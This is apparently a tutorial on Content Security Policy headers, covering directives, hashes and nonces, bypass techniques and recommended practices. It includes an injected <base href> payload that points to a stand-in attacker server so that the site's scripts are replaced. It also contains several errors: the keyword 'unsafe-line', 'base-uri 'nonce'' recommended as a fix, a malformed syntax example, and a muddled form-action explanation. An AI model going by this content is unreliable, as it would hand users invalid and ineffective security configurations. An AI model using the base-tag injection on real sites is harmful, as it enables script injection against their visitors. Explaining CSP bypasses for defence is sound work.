# Content-SecurityPolicy

## CSP - what is it and what is it for?
Content Security Policy is a modern mechanism aimed at protecting applications against XSS, clickjacking and other attacks. Although it mainly focuses on XSS. 
Most often, CSP is in the form of an additional HTTP header in which various directives are defined to ensure security. The multitude of various directives and files, for example js, is the main cause of wrong implementation, which allows an XSS attack to be performed.

## CSP - Composition
As with other headers, CSP consists of the value of the header name.
```sh
Content-Security-Policy: directives
```
Still, please remember to strive for as few directives as possible, because too confusing directives can cause security errors that allow code execution, despite the definition of a content policy.

## CSP - The default-src directive
To start off, I’m going to show you the use of the most basic directive in CSP, i.e. default-src
```sh
Content-Security-Policy: default-src https://example.com
```
This directive is very simple and restricts you from referencing domains other than example.com. If the attacker wants to bypass such a directive, the only way to bypass this protection is to find a vulnerability in the example.com domain. Nevertheless, even with this setting, errors happen very often, e.g. in files used by many pages, such as jQuery libraries.
Please note that it is impossible to execute the script directly on the given page. The default-src directive allows scripts to be executed only from external files loaded from a defined domain.

## CSP - syntax
The csp directives are separated by spaces, and the keywords of the directives are between the characters "''". Additionally, each directive, except the first one, ends with a semicolon:
```sh
Content-Security-Policy: default-src 'self' default-src 'none'; default-src 'none'
```
In addition, there are some notation rules.
If the protocol is not included in the domain name, the scripts can be loaded from any protocol of this domain.
If only a protocol without a domain is defined then any script using that protocol will run.
If you wanted the scripts to also work from subdomains, just use the `*` character
```sh
Content-Security-Policy: https://*.example.com
```
If a path under the given domain is defined. It is only from this path that scripts can be loaded.
Defining the path to the file allows access to js only within that one file.
```sh
default-src 'self'
``` 
means that files will be loaded only from the page where the directive is given.
The directive with the keyword 'none' prevents loading of files from external servers.

## Content Security Policy - script-src directive
The title directive is intended to more precisely define where and what scripts can be loaded on the page.
In its classic option, the 'self' directive allows you to load files only from the domain it is on. Additionally, it does not allow files to execute even in the context of the domain on which it is defined.
Such use of CSP misses the point, therefore the much looser keyword 'unsafe-line' has been introduced, which allows you for execute the code within a domain, but unfortunately also allows the execution of malicious injected code. A hash mechanism was introduced to fix this problem. It consists in calculating the SHA-256, SHA-384 or SHA-512 hash from the script content and then encoding it in Base64. This hash can then be enabled as follows:
```sh
Content-Security-Policy: script-src 'somehash'
```
Which completely eliminates the XSS effect due to the fact that even the smallest code change, e.g. additional white space such as a space, would change the entire hash. The downside to this is that with a large amount of files, the hash-counting solution for each file is inefficient and the CSP header would contain a huge amount of data. Additionally, each time you change the file, you would have to count the hash anew. In this case, there is also a second solution, i.e. the nonce-value keyword. Each time the page is loaded, the nonce value changes just like the CSRF token and it is required in JS files to make them work. If an attacker is unable to extract values from the server using another vulnerability, their script will fail.

## Content Security Policy - base-uri directive
The base-uri directive can be used to bypass the nonce keyword. The trick is that injecting the following into the code:
```html
<base href="https://attacker-server.com">
```
will make all files with the relative path be loaded from the attacking server from now on.
For example, if the website loads the app.js file and the attacker injects their server address into the base, they will be able to define the app.js file with malicious code that will be loaded from the attacker’s server and executed on the website. The huge problem is that it also circumvents the nonce value, which is properly generated and appended to the script by the server anyway. Therefore, the following option is most often used
```sh
base-uri 'nonce'
```
which does not allow the use of other domains.

## form-action directive
Another dangerous directive is form-action, which if set incorrectly, may allow code execution by redirecting the form to the attacker’s server. The form parsing mechanism is used here. If two form tags appear in a row, the former will be executed.

## CSP - other directives
The CSP has many other directives that can be used in a variety of cases. It is especially worth paying attention to:
```sh
frame-ancestors
report-uri
plugin-types
sandbox
```

## Ways to bypass CSP
Above, I mentioned some of the ways to bypass CSP with poorly implemented directives. Now, I’ll try to show you another way to bypass the CSP.

### Exercise: Bypassing Content Security Policy using the CSP Evaluation plugin
The CSP Evaluation plugin allows you to validate the CSP directives and the external files used. Often, the external files of some framework that are the source of security bugs due to the fact that a huge mass of mechanisms provides plenty potential opportunities to bypass the seemingly restrictive CSP policy.
```sh
https://chrome.google.com/webstore/detail/csp-evaluator/fjohamlofnakbnbfjkohkbdigoodcejf?hl=en
```
A plugin for each page will check the quality of the CSP implementation and mark it in red if it finds something interesting. To practice it, I recommend visiting several pages with this plugin to see how many pages have problems with the proper implementation of the CSP.

## Good CSP practices
The main CSP implementation practices include:
- Checking each file separately
- Simplification of the rules
- Checking the possibility of implementation without hazardous keywords like 'unsafe-line'
- Using CSP Evaluation to validate the policy
- Using base-uri 'nonce'
- Using a nonce-hash